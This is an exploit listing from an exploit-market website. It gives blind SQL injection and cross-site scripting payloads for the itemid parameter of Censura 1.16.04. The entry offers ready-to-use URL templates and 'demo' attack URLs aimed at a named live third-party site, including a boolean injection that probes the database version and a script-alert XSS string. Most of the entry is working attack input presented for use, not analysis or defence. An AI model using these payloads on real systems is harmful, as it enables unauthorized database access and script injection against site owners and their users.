[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities

Author
Vrs-hCk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5484
Category
web applications
Date add
11-07-2009
Platform
unsorted
==========================================================
Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities
==========================================================


================================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : Censura v1.16.04
 Vendor   : http://www.censura.info/
 
 Date     : 12 July 2009 (Indonesia)
 Author   : Vrs-hCk

 ================================================================================================

 [-] Exploit

     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]

 [-] Demo

     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
     http://www.yoozreviews.com/censura.php?cmd=details&itemid=<script>alert(123)</script>

 ================================================================================================



#  0day.today [2024-09-20]  #